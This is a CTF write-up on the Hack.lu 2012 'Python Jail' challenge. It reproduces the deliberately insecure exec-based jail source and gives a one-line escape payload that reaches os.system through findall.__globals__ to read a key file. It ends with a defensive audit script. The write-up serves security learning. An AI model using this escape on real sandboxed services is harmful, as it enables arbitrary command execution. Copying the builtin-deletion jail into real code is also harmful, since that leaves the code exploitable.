team pong

Dutch CTF "team pong" write-ups and other stuff

Hack.lu CTF 2012 – #7 Python Jail


The challenge:

You are surrounded by zombies. You heard there's a safe house nearby, but climbing fences is hard with a beer belly. Thank god, there's another survivor over there. "Hey! Help me!", you shout. He just laughs and shakes you off the fence. Asshole.

Later, you see his dead body lying in front of a high security door secured by automated weapons. Heh... karma is a bitch. But that means you'll have to find another way in. In this nerd area, all the doors are secured with stupid computer puzzles. So, what the heck. Better try this one:

https://ctf.fluxfingers.net/challenges/python_jail/chal.py 
ctf.fluxfingers.net tcp/2045 

Hint: You'll find the entrance in "./key"

Notes: This challenge is a tribute to PHDays Finals 2012 challenge 'ndevice'. Thanks again, I had fun solving it. I'm fairly certain that this challenge avoids being exploitable by the tricks we could use in PHDays (the module "os" was imported...). So, no advantage for people who did not attend PHDays.

The source code:

#!/usr/bin/env python
'''
Running instructions.
 sockets are insecure. We do not implement any socket behaviour in this
 file.
 Please make this file +x and run with socat:
    socat TCP-LISTEN:45454,fork EXEC:./chal.py,pty,stderr

Debugging:
 Just execute chal.py and play on terminal, no need to run socat

Note:
 This challenge is a tribute to PHDays Finals 2012 challenge 'ndevice'.
 Thanks again, I had fun solving it.
 
 I'm fairly certain that this challenge avoids being exploitable by
 the tricks we could use in PHDays (the module "os" was imported...).
 So, no advantage for people who did not attend PHDays.
 

'''

def make_secure():
    UNSAFE_BUILTINS = ['open',
                       'file',
                       'execfile',
                       'compile',
                       'reload',
                       '__import__',
                       'eval',
                       'input'] ## block objet?
    for func in UNSAFE_BUILTINS:
        del __builtins__.__dict__[func]

from re import findall
make_secure()


print 'Go Ahead, Expoit me >;D'


while True:
    try:
        inp = findall('\S+', raw_input())[0]
        a = None
        exec 'a=' + inp
        print 'Return Value:', a
    except Exception, e:
        print 'Exception:', e

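The Python jail removes almost all interesting functions from scope by deleting them from the builtins dictionary. However, we still have a reference to the findall function from the re module. Every Python function carries a __globals__ attribute, the global namespace of the module that defines it, so through this reference all variables available to findall can be reached, including the sys module. sys.modules in turn lists every module that is already loaded, so from there we can reference the os module and call system to get the contents of the key file. Because the jail only executes the first whitespace-delimited token of the input, the command cannot contain a space, hence cat<key instead of cat key: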

findall.__globals__['sys'].modules['os'].system("cat<key")
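
Why deleting names from the builtins dictionary does not contain the jail, as an added example that is not part of the original write-up or of chal.py: a Python 3 audit that walks the __globals__ of every object in an exec scope and lists the modules reachable from it. The names reachable_modules, audit_namespace and JAIL_SCOPE are made up for this example, and the scope is a constructed stand-in for the one the challenge executes input in.

```python
import types
from re import findall  # the one import chal.py leaves in scope


def reachable_modules(obj):
    """Names of all modules reachable from obj.__globals__ by following
    module-level references (breadth-first, each module visited once)."""
    func_globals = getattr(obj, "__globals__", None)
    if not isinstance(func_globals, dict):
        return []  # C builtins such as len expose no __globals__
    seen = {}
    queue = [func_globals]
    while queue:
        scope = queue.pop(0)
        for value in list(scope.values()):
            if isinstance(value, types.ModuleType) and id(value) not in seen:
                seen[id(value)] = value.__name__
                queue.append(vars(value))  # continue into that module's globals
    return sorted(seen.values())


def audit_namespace(namespace):
    """Report every name in an exec() scope that leaks module access."""
    report = {}
    for name, obj in namespace.items():
        mods = reachable_modules(obj)
        if mods:
            report[name] = mods
    return report


# Constructed stand-in for the scope chal.py executes input in: the re helper
# it imported plus a C builtin that survives make_secure().
JAIL_SCOPE = {"findall": findall, "len": len}

if __name__ == "__main__":
    for name, mods in audit_namespace(JAIL_SCOPE).items():
        print("%s leaks %d modules, sys reachable: %s"
              % (name, len(mods), "sys" in mods))
```

Any name the audit reports needs to be removed from the scope or the evaluation moved into a separate, OS-restricted process; trimming the builtins list does not change the result.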

Written by teampong

November 9, 2012 at 7:13 am
